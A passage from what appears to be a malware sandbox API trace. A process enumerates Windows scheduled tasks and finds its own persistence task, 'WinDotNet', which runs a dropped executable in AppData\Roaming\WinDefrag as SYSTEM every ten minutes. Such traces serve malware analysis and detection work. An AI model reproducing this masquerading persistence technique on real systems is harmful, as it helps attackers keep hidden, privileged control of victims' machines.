(lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.645] IUnknown:Release (This=0x4567b0) returned 0x0 [0257.645] IRegisteredTaskCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x1), ppRegisteredTask=0x1edfc8 | out: ppRegisteredTask=0x1edfc8*=0x4567b0) returned 0x0 [0257.645] IRegisteredTask:get_Name (in: This=0x4567b0, pName=0x1edfc0 | out: pName=0x1edfc0*="OneDrive Standalone Update Task-S-1-5-21-2345716840-1148442690-1481144037-1000") returned 0x0 [0257.645] IRegisteredTask:get_Xml (in: This=0x4567b0, pXml=0x1edfb0 | out: pXml=0x1edfb0*="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n") returned 0x0 [0257.651] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.684] IUnknown:Release (This=0x4567b0) returned 0x0 [0257.685] IRegisteredTaskCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x1), ppRegisteredTask=0x1edfc8 | out: ppRegisteredTask=0x1edfc8*=0x4567b0) returned 0x0 [0257.685] IRegisteredTask:get_Name (in: This=0x4567b0, pName=0x1edfc0 | out: pName=0x1edfc0*="WinDotNet") returned 0x0 [0257.685] IRegisteredTask:get_Xml (in: This=0x4567b0, pXml=0x1edfb0 | out: pXml=0x1edfb0*="\r\n\r\n \r\n 1.0.1\r\n WinDotNet\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT10M\r\n P415DT15H58M\r\n false\r\n \r\n 2018-12-06T22:30:54\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n") returned 0x0 [0257.691] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.1\r\n WinDotNet\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT10M\r\n P415DT15H58M\r\n false\r\n \r\n 2018-12-06T22:30:54\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n" [0257.727] lstrcmpW (lpString1="WinDotNet", lpString2="WinDotNet") returned 0 [0257.727] IUnknown:Release (This=0x4567b0) returned 0x0 [0257.727] IUnknown:Release (This=0x456710) returned 0x0 [0257.727] ITaskFolder:GetFolders (in: This=0x46df80, flags=0, ppFolders=0x1edfb8 | out: ppFolders=0x1edfb8*=0x456710) returned 0x0 [0257.730] ITaskFolderCollection:get_Count (in: This=0x456710, pCount=0x1ee138 | out: pCount=0x1ee138*=3) returned 0x0 [0257.730] ITaskFolderCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1), ppFolder=0x1edfb0 | out: ppFolder=0x1edfb0*=0x4567c0) returned 0x0 [0257.730] ITaskFolder:GetTasks (in: This=0x4567c0, flags=1, ppTasks=0x1ede40 | out: ppTasks=0x1ede40*=0x456830) returned 0x0 [0257.731] IRegisteredTaskCollection:get_Count (in: This=0x456830, pCount=0x1edf90 | out: pCount=0x1edf90*=0) returned 0x0 [0257.731] IUnknown:Release (This=0x456830) returned 0x0 [0257.731] ITaskFolder:GetFolders (in: This=0x4567c0, flags=0, ppFolders=0x1ede28 | out: ppFolders=0x1ede28*=0x456830) returned 0x0 [0257.735] ITaskFolderCollection:get_Count (in: This=0x456830, pCount=0x1edfa8 | out: pCount=0x1edfa8*=3) returned 0x0 [0257.735] ITaskFolderCollection:get_Item (in: This=0x456830, index=0x1ede70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x1ede20 | out: ppFolder=0x1ede20*=0x456970) returned 0x0 [0257.735] ITaskFolder:GetTasks (in: This=0x456970, flags=1, ppTasks=0x1edcb0 | out: ppTasks=0x1edcb0*=0x4569f0) returned 0x0 [0257.741] IRegisteredTaskCollection:get_Count (in: This=0x4569f0, pCount=0x1ede00 | out: pCount=0x1ede00*=6) returned 0x0 [0257.741] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.741] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="Office Automatic Updates") returned 0x0 [0257.741] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0257.745] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.796] IUnknown:Release (This=0x456b30) returned 0x0 [0257.796] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.796] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="Office ClickToRun Service Monitor") returned 0x0 [0257.796] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0257.798] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.839] IUnknown:Release (This=0x456b30) returned 0x0 [0257.839] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.839] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="OfficeBackgroundTaskHandlerLogon") returned 0x0 [0257.839] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0257.841] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.885] IUnknown:Release (This=0x456b30) returned 0x0 [0257.885] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.885] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="OfficeBackgroundTaskHandlerRegistration") returned 0x0 [0257.885] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0257.887] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.921] IUnknown:Release (This=0x456b30) returned 0x0 [0257.921] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.921] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0257.921] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0257.924] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.959] IUnknown:Release (This=0x456b30) returned 0x0 [0257.959] IRegisteredTaskCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x1edca8 | out: ppRegisteredTask=0x1edca8*=0x456b30) returned 0x0 [0257.959] IRegisteredTask:get_Name (in: This=0x456b30, pName=0x1edca0 | out: pName=0x1edca0*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0257.959] IRegisteredTask:get_Xml (in: This=0x456b30, pXml=0x1edc90 | out: pXml=0x1edc90*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n 